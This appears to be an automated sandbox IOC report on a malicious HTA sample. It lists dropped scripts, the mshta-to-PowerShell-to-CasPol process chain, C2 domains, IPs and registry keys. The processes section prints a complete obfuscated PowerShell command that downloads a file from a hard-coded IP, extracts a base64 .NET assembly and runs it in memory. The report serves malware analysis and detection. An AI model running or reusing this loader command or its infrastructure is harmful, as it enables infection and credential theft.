IOC Report
creatingbestthingsforhisbeststepstotakehim.hta

loading gifFilesProcessesURLsDomainsIPsRegistryMemdumps864201,00010010Label

Files

File Path
Type
Category
Malicious
Download
creatingbestthingsforhisbeststepstotakehim.hta
HTML document, ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Roaming\jasgbtisot.dat
data
dropped
malicious
C:\Windows\Temp\Sheena.vbs
ASCII text, with CRLF line terminators
dropped
malicious
C:\Windows\Temp\anonymiser.bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.chk
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x0400d571, page size 16384, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\0[1].txt
Unicode text, UTF-8 text, with very long lines (22523), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3s24tbxd.fpq.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_emipnk2l.mr3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bhv90B.tmp
Extensible storage engine DataBase, version 0x620, checksum 0xd2efc739, page size 32768, DirtyShutdown, Windows version 10.0
dropped
C:\Users\user\AppData\Local\Temp\kpsctizepnmfbmfnkvavzvmxchsqhsjyz
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
\Device\Null
ASCII text, with CRLF line terminators, with overstriking
dropped
There are 7 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\mshta.exe
mshta.exe "C:\Users\user\Desktop\creatingbestthingsforhisbeststepstotakehim.hta"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Windows\Temp\anonymiser.bat"
malicious
C:\Windows\SysWOW64\wscript.exe
wscript //nologo "C:\Windows\Temp\Sheena.vbs"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bz#HU#cgBl#HQ#aQBl#HM#I##9#C##JwB0#Hg#d##u#G0#aQBo#GU#awBh#HQ#bwB0#HM#c#Bl#HQ#cwB0#HM#ZQBi#HM#aQBo#HI#bwBm#HM#ZwBu#Gk#a#B0#HQ#cwBl#GI#ZwBu#Gk#d#Bh#GU#cgBj#C8#YQBz#Gk#dg#v#H##c#Bt#GE#e##v#DI#Mw#u#DM#Mg#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#C##PQ#g#CQ#cwB1#HI#ZQB0#Gk#ZQBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bt#G8#bwBy#Gw#YQBu#GQ#cw#g#D0#I##n#Gg#d#B0#H##Og#v#C8#Mg#x#Dc#Lg#x#DU#N##u#DU#NQ#u#DE#O##1#C8#e#Bh#G0#c#Bw#C8#Yw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#ZwBv#Gw#Z#Bj#HU#c##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bl#G4#YwBy#Gk#bQBz#G8#bg#g#D0#I##k#Gc#bwBs#GQ#YwB1#H##LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBv#G8#cgBs#GE#bgBk#HM#KQ#7#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GU#bgBj#HI#aQBt#HM#bwBu#Ck#Ow#k#EQ#YQBj#Gk#YQBu#HM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#Gc#bwBu#G8#YwBh#Gw#eQBj#GU#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##9#C##J#B1#G4#c#By#G8#dgBv#Gs#ZQBk#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#R#Bh#GM#aQBh#G4#cw#p#Ds#J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#D0#I##k#HU#bgBw#HI#bwB2#G8#awBl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bn#G8#bgBv#GM#YQBs#Hk#YwBl#HM#KQ#7#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#bwBy#HQ#a#Bv#GQ#bwB4#G4#ZQBz#HM#I##t#Gc#d##g#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##r#D0#I##k#EQ#YQBj#Gk#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#I##9#C##J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#C0#I##k#GE#bgB0#Gk#YwBo#HI#ZQB0#Gk#Yw#7#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#C##PQ#g#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#L##g#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#KQ#7#CQ#cgBl#HM#YQB6#HU#cgBp#G4#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#Ck#Ow#k#GQ#ZQBj#GU#bgB0#HI#YQB0#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#By#GU#cwBh#Ho#dQBy#Gk#bg#p#Ds#J#B2#GU#cwB0#GU#ZQ#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBD#GE#cwBQ#G8#b##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#y#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
malicious
C:\Windows\SysWOW64\recover.exe
C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\kpsctizepnmfbmfnkvavzvmxchsqhsjyz"
malicious
C:\Windows\SysWOW64\recover.exe
C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\vjynt"
malicious
C:\Windows\SysWOW64\recover.exe
C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\xllfutvz"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\timeout.exe
timeout /t 1 /nobreak
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p
There are 4 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://217.154.55.185/xampp/c/new_image.jpg
217.154.55.185
malicious
http://172.245.123.32/xampp/visa/creatingbestthingsforhisbeststepstotakehim.txt
172.245.123.32
malicious
hftook7lmaroutsg5.duckdns.org
malicious
hftook7lmaroutsg4.duckdns.org
malicious
hftook7lmaroutsg3.duckdns.org
malicious
hftook7lmaroutsg2.duckdns.org
malicious
hftook7lmaroutsg1.duckdns.org
malicious
https://paste.ee/d/c30NOIBR/0
23.186.113.60
http://www.imvu.comr
unknown
https://dev.ditu.live.com/REST/v1/Routes/
unknown
http://172.245.123.32
unknown
https://dev.virtualearth.net/REST/v1/Routes/Driving
unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
unknown
https://aka.ms/pscore6lBDr
unknown
https://contoso.com/License
unknown
https://dev.virtualearth.net/REST/v1/Routes/Walking
unknown
https://analytics.paste.ee
unknown
http://www.nirsoft.net
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
https://dev.ditu.live.com/mapcontrol/logging.ashx
unknown
https://github.com/koswald/VBScript/blob/master/SetupPerUser.md
unknown
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
unknown
https://www.google.com
unknown
https://dev.virtualearth.net/REST/v1/Transit/Schedules/
unknown
http://geoplugin.net/json.gp/C
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://paste.ee/
unknown
https://login.yahoo.com/config/login
unknown
https://cdnjs.cloudflare.com
unknown
https://cdnjs.cloudflare.com;
unknown
http://www.nirsoft.net/
unknown
https://github.com/koswald/VBScript
unknown
https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbsG
unknown
http://www.imvu.comata
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.bingmapsportal.com
unknown
https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
unknown
https://secure.gravatar.com
unknown
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
unknown
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
unknown
http://nuget.org/NuGet.exe
unknown
http://geoplugin.net/json.gpa
unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://geoplugin.net/json.gpl
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://geoplugin.net/json.gpj
unknown
https://go.micro
unknown
https://dev.ditu.live.com/REST/v1/Transit/Stops/
unknown
https://dev.virtualearth.net/REST/v1/Routes/
unknown
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
unknown
https://www.google.com;
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
unknown
http://crl.ver)
unknown
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
unknown
https://g.live.com/odclientsettings/ProdV2/C:
unknown
http://geoplugin.net/json.gpx
unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
unknown
https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
unknown
https://analytics.past
unknown
https://dev.virtualearth.net/REST/v1/Locations
unknown
https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
unknown
https://dev.virtualearth.net/mapcontrol/logging.ashx
unknown
https://github.com/Pester/Pester
unknown
http://geoplugin.net/json.gpSystem32
unknown
http://217.154.55.185
unknown
https://paste.ee/d/c30NOIBR/0/
unknown
http://geoplugin.net/json.gp
178.237.33.50
https://g.live.com/odclientsettings/Prod/C:
unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
unknown
https://dynamic.t
unknown
https://paste.ee/c
unknown
https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs
unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit
unknown
https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?
unknown
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
unknown
https://analytics.paste.ee;
unknown
https://www.google.com/accounts/servicelogin
unknown
https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
unknown
https://dev.ditu.live.com/REST/v1/Locations
unknown
https://themes.googleusercontent.com
unknown
http://www.ebuddy.com
unknown
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
unknown
There are 80 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
hftook7lmaroutsg2.duckdns.org
176.65.144.247
malicious
hftook7lmaroutsg1.duckdns.org
192.169.69.26
malicious
paste.ee
23.186.113.60
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
217.154.55.185
unknown
United Kingdom
malicious
192.169.69.26
hftook7lmaroutsg1.duckdns.org
United States
malicious
172.245.123.32
unknown
United States
malicious
176.65.144.247
hftook7lmaroutsg2.duckdns.org
Germany
malicious
23.186.113.60
paste.ee
Reserved
178.237.33.50
geoplugin.net
Netherlands
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\kmbgnrgsd-N2XF5V
exepath
HKEY_CURRENT_USER\SOFTWARE\kmbgnrgsd-N2XF5V
licence
HKEY_CURRENT_USER\SOFTWARE\kmbgnrgsd-N2XF5V
time
HKEY_CURRENT_USER\SOFTWARE\kmbgnrgsd-N2XF5V
UID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
There are 10 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
Download
4540000
unclassified section
page execute and read and write
malicious
400000
system
page execute and read and write
malicious
400000
remote allocation
page execute and read and write
malicious
11E7000
heap
page read and write
malicious
5FC6000
trusted library allocation
page read and write
malicious
6382000
trusted library allocation
page read and write
malicious
33DD000
stack
page read and write
86BE000
stack
page read and write
738A000
stack
page read and write
5980000
heap
page read and write
29365861000
heap
page read and write
5B89000
heap
page read and write
29365832000
heap
page read and write
4D64000
heap
page read and write
3094000
heap
page read and write
3094000
heap
page read and write
799000
heap
page read and write
5B71000
heap
page read and write
29365835000
heap
page read and write
757E000
stack
page read and write
583F000
stack
page read and write
2A8B000
heap
page read and write
4D81000
heap
page read and write
ADC000
stack
page read and write
4D81000
heap
page read and write
2A86000
heap
page read and write
7940000
trusted library allocation
page execute and read and write
2B68C7B000
stack
page read and write
4DA2000
heap
page read and write
4D81000
heap
page read and write
4E3E000
stack
page read and write
52A0000
trusted library allocation
page read and write
4D2C000
stack
page read and write
7990000
trusted library allocation
page read and write
7680000
heap
page read and write
5251000
heap
page read and write
4BEF000
stack
page read and write
21A94EB0000
trusted library allocation
page read and write
4E50000
heap
page read and write
5F0000
heap
page read and write
4F7000
stack
page read and write
7699000
heap
page read and write
5A6C000
heap
page read and write
79B0000
trusted library allocation
page read and write
10016000
direct allocation
page execute and read and write
5A18000
heap
page read and write
78C000
stack
page read and write
4D75000
heap
page read and write
2FA3000
trusted library allocation
page execute and read and write
C24000
heap
page read and write
21A9502E000
heap
page read and write
9DC000
heap
page read and write
2936587A000
heap
page read and write
D47000
heap
page read and write
29365844000
heap
page read and write
2A90000
heap
page read and write
773B000
heap
page read and write
79A0000
trusted library allocation
page read and write
5276000
trusted library allocation
page read and write
5282000
trusted library allocation
page read and write
7B3000
heap
page read and write
2A95000
heap
page read and write
4D7E000
heap
page read and write
A4F000
stack
page read and write
5DBF000
stack
page read and write
21A94E50000
trusted library allocation
page read and write
D3C000
stack
page read and write
29365F40000
trusted library allocation
page read and write
780A000
trusted library allocation
page read and write
ED79C7E000
stack
page read and write
2A65000
heap
page read and write
538E000
stack
page read and write
758000
heap
page read and write
7830000
heap
page execute and read and write
5A65000
heap
page read and write
4D7E000
heap
page read and write
7D0000
heap
page read and write
825000
heap
page read and write
803000
heap
page read and write
803000
heap
page read and write
5251000
heap
page read and write
82D000
heap
page read and write
21A90640000
trusted library allocation
page read and write
8410000
trusted library allocation
page execute and read and write
7B3000
heap
page read and write
3673000
heap
page read and write
3294000
heap
page read and write
9A72000
heap
page read and write
7E9000
heap
page read and write
4D81000
heap
page read and write
520E000
stack
page read and write
4D64000
heap
page read and write
2936582B000
heap
page read and write
4B80000
heap
page execute and read and write
4D81000
heap
page read and write
301B000
stack
page read and write
ED79B7E000
unkown
page readonly
4D83000
heap
page read and write
3E4F000
stack
page read and write
5BE3000
heap
page read and write
2936585A000
heap
page read and write
21A94D90000
trusted library allocation
page read and write
6D0000
heap
page read and write
53A1000
heap
page read and write
59DB000
heap
page read and write
21A8F85B000
heap
page read and write
7780000
trusted library allocation
page read and write
5862000
heap
page read and write
3190000
trusted library allocation
page read and write
5251000
heap
page read and write
3390000
heap
page read and write
585000
heap
page read and write
4D8A000
heap
page read and write
2DFC000
stack
page read and write
7210000
heap
page read and write
3294000
heap
page read and write
4D61000
heap
page read and write
5251000
heap
page read and write
4D5D000
stack
page read and write
825000
heap
page read and write
5A6C000
heap
page read and write
4D81000
heap
page read and write
4D6C000
heap
page read and write
3294000
heap
page read and write
303E000
heap
page read and write
3294000
heap
page read and write
3398000
heap
page read and write
4D7E000
heap
page read and write
4D61000
heap
page read and write
21A8F780000
heap
page read and write
9A30000
heap
page read and write
29F0000
heap
page read and write
4FA000
stack
page read and write
5251000
heap
page read and write
38E0000
unclassified section
page execute and read and write
21A94D40000
trusted library allocation
page read and write
59BA000
heap
page read and write
4D75000
heap
page read and write
353A000
heap
page read and write
475000
remote allocation
page execute and read and write
2B03000
heap
page read and write
3094000
heap
page read and write
3490000
heap
page readonly
2AA3000
heap
page read and write
4DA8000
heap
page read and write
3095000
heap
page read and write
4DA2000
heap
page read and write
5670000
trusted library allocation
page read and write
84BE000
stack
page read and write
21A8F8B3000
heap
page read and write
5BBE000
heap
page read and write
806000
heap
page read and write
2FF2000
heap
page read and write
59DB000
heap
page read and write
21A94DD1000
trusted library allocation
page read and write
5BA0000
heap
page read and write
21A90CA1000
trusted library allocation
page read and write
4D61000
heap
page read and write
4DBC000
stack
page read and write
4D70000
heap
page read and write
ED797FE000
stack
page read and write
2936584D000
heap
page read and write
6ECA000
trusted library allocation
page read and write
400000
system
page execute and read and write
86FE000
stack
page read and write
816000
heap
page read and write
7592000
heap
page read and write
2AAB000
heap
page read and write
57E000
stack
page read and write
ED793DB000
stack
page read and write
2A95000
heap
page read and write
3294000
heap
page read and write
4D81000
heap
page read and write
10001000
direct allocation
page execute and read and write
5A61000
heap
page read and write
3034000
stack
page read and write
459E000
unclassified section
page execute and read and write
353A000
heap
page read and write
2B692FE000
stack
page read and write
4DBA000
heap
page read and write
5A20000
heap
page read and write
4D7E000
heap
page read and write
70CD000
stack
page read and write
5251000
heap
page read and write
2AA9000
heap
page read and write
29365878000
heap
page read and write
2B0A000
heap
page read and write
4D61000
heap
page read and write
341E000
stack
page read and write
5BFC000
heap
page read and write
5BCA000
heap
page read and write
5868000
heap
page read and write
3520000
heap
page read and write
5350000
trusted library allocation
page read and write
DD5000
heap
page read and write
4D81000
heap
page read and write
30B0000
heap
page read and write
29365843000
heap
page read and write
74BE000
stack
page read and write
680000
trusted library allocation
page read and write
293658AD000
heap
page read and write
2F10000
heap
page read and write
2C1E000
stack
page read and write
4D7E000
heap
page read and write
1F0000
heap
page read and write
4D81000
heap
page read and write
5BE3000
heap
page read and write
2ADC000
heap
page read and write
2F8E000
stack
page read and write
548F000
stack
page read and write
3294000
heap
page read and write
32E9000
heap
page read and write
3260000
trusted library allocation
page read and write
2FFC000
stack
page read and write
4D81000
heap
page read and write
5A65000
heap
page read and write
29365850000
heap
page read and write
C80000
heap
page read and write
4F68000
heap
page read and write
453E000
stack
page read and write
3094000
heap
page read and write
5670000
trusted library allocation
page read and write
3094000
heap
page read and write
56C000
stack
page read and write
7800000
trusted library allocation
page read and write
4D81000
heap
page read and write
21A9510C000
heap
page read and write
1255000
heap
page read and write
4550000
heap
page read and write
4810000
heap
page read and write
21A94E30000
trusted library allocation
page read and write
4C17000
heap
page read and write
5251000
heap
page read and write
21A94E50000
trusted library allocation
page read and write
5B8E000
heap
page read and write
7B3000
heap
page read and write
4DC3000
heap
page read and write
527A000
trusted library allocation
page read and write
7AD000
heap
page read and write
4DA8000
heap
page read and write
7E9000
heap
page read and write
499E000
stack
page read and write
21A90113000
heap
page read and write
29365864000
heap
page read and write
57E5000
trusted library allocation
page read and write
C16000
heap
page read and write
3294000
heap
page read and write
D40000
heap
page read and write
3294000
heap
page read and write
7950000
trusted library allocation
page read and write
3094000
heap
page read and write
7D1000
heap
page read and write
4D8A000
heap
page read and write
3094000
heap
page read and write
59DC000
heap
page read and write
5A78000
heap
page read and write
21A950C4000
heap
page read and write
2B6787E000
stack
page readonly
5251000
heap
page read and write
21A90000000
heap
page read and write
45C000
system
page execute and read and write
3198000
heap
page read and write
B1D000
stack
page read and write
1244000
heap
page read and write
4D9F000
heap
page read and write
2B66E8B000
stack
page read and write
7820000
trusted library allocation
page read and write
5A94000
heap
page read and write
4D40000
heap
page read and write
720A000
stack
page read and write
C20000
heap
page read and write
293657B0000
heap
page read and write
59DB000
heap
page read and write
21A950FF000
heap
page read and write
2ABA000
heap
page read and write
5BF3000
heap
page read and write
9C8000
heap
page read and write
4D60000
heap
page read and write
4616000
unclassified section
page execute and read and write
2B6937E000
unkown
page readonly
29365870000
heap
page read and write
2A95000
heap
page read and write
7E2000
heap
page read and write
3190000
heap
page read and write
798000
heap
page read and write
5030000
heap
page read and write
5A1F000
heap
page read and write
5A0B000
heap
page read and write
29365856000
heap
page read and write
2FEF000
stack
page read and write
2A86000
heap
page read and write
7A00000
trusted library allocation
page read and write
4DBA000
heap
page read and write
32DD000
stack
page read and write
54CE000
stack
page read and write
4D81000
heap
page read and write
29365871000
heap
page read and write
4DA2000
heap
page read and write
4D71000
heap
page read and write
4DA1000
heap
page read and write
7EF000
heap
page read and write
474000
system
page execute and read and write
17A000
stack
page read and write
2A98000
heap
page read and write
5251000
heap
page read and write
25E9000
stack
page read and write
45B4000
unclassified section
page execute and read and write
B90000
heap
page read and write
7744000
heap
page read and write
5980000
remote allocation
page read and write
4F50000
heap
page read and write
C10000
heap
page read and write
5C49000
heap
page read and write
5250000
heap
page read and write
78BE000
stack
page read and write
5BA6000
heap
page read and write
59B9000
heap
page read and write
5BE3000
heap
page read and write
29365853000
heap
page read and write
560E000
stack
page read and write
52B5000
trusted library allocation
page read and write
4D61000
heap
page read and write
ED79E7E000
stack
page read and write
572E000
heap
page read and write
4D8A000
heap
page read and write
5BB9000
heap
page read and write
76E000
heap
page read and write
4D60000
heap
page read and write
4D71000
heap
page read and write
2AFD000
heap
page read and write
4D81000
heap
page read and write
3094000
heap
page read and write
2A80000
heap
page read and write
21A94E40000
trusted library allocation
page read and write
151F000
stack
page read and write
38FB000
unclassified section
page execute and read and write
10FC000
stack
page read and write
29FC000
heap
page read and write
29365894000
heap
page read and write
4D75000
heap
page read and write
21A8F917000
heap
page read and write
7035000
heap
page execute and read and write
4D69000
heap
page read and write
2B6757E000
unkown
page readonly
29365831000
heap
page read and write
29365866000
heap
page read and write
10000000
direct allocation
page read and write
2AA6000
heap
page read and write
7A2000
heap
page read and write
5A23000
heap
page read and write
21A94EC0000
trusted library allocation
page read and write
2936589A000
heap
page read and write
406A000
heap
page read and write
4D81000
heap
page read and write
21A950CA000
heap
page read and write
320E000
stack
page read and write
21A9508F000
heap
page read and write
4D94000
heap
page read and write
29365889000
heap
page read and write
29365837000
heap
page read and write
21A95330000
trusted library allocation
page read and write
4D7E000
heap
page read and write
7AD000
heap
page read and write
79E0000
trusted library allocation
page read and write
2A80000
heap
page read and write
21A90CD0000
trusted library allocation
page read and write
21A8F800000
heap
page read and write
2A92000
heap
page read and write
803000
heap
page read and write
2FB9000
trusted library allocation
page read and write
32E0000
heap
page read and write
4CDF000
stack
page read and write
4D70000
heap
page read and write
4D99000
heap
page read and write
4D9B000
heap
page read and write
7030000
heap
page execute and read and write
7C8000
heap
page read and write
8420000
trusted library allocation
page read and write
2936585D000
heap
page read and write
9730000
trusted library section
page read and write
ED796FE000
stack
page read and write
2AA9000
heap
page read and write
21A8F906000
heap
page read and write
4D6D000
heap
page read and write
21A95021000
heap
page read and write
21A8F8B3000
heap
page read and write
21A8F8AC000
heap
page read and write
53F7000
trusted library allocation
page read and write
4D7E000
heap
page read and write
3095000
heap
page read and write
21A94D62000
trusted library allocation
page read and write
4D7E000
heap
page read and write
21A94CD0000
trusted library allocation
page read and write
4D81000
heap
page read and write
51DE000
stack
page read and write
2890000
heap
page read and write
787E000
stack
page read and write
B8F000
stack
page read and write
33B1000
heap
page read and write
DD0000
heap
page read and write
2B68479000
stack
page read and write
2E63000
heap
page read and write
7E2000
heap
page read and write
2F0E000
stack
page read and write
7ED000
heap
page read and write
5251000
heap
page read and write
597E000
stack
page read and write
78FE000
stack
page read and write
4D84000
heap
page read and write
2C7F000
stack
page read and write
21A90015000
heap
page read and write
478000
remote allocation
page execute and read and write
367D000
heap
page read and write
6FDD000
stack
page read and write
21A8F870000
heap
page read and write
2DE0000
heap
page read and write
5BF3000
heap
page read and write
21A8F890000
heap
page read and write
5B70000
heap
page read and write
52C7000
trusted library allocation
page read and write
4DE4000
heap
page read and write
5A18000
heap
page read and write
5BC1000
heap
page read and write
319A000
trusted library allocation
page execute and read and write
3095000
heap
page read and write
7F1000
heap
page read and write
336F000
stack
page read and write
21A8F8BD000
heap
page read and write
3010000
heap
page read and write
2FA0000
trusted library allocation
page read and write
4D61000
heap
page read and write
2A87000
heap
page read and write
2A63000
heap
page read and write
7E4000
heap
page read and write
4D6C000
heap
page read and write
693000
heap
page read and write
B18000
stack
page read and write
456000
system
page execute and read and write
141E000
stack
page read and write
21A94F00000
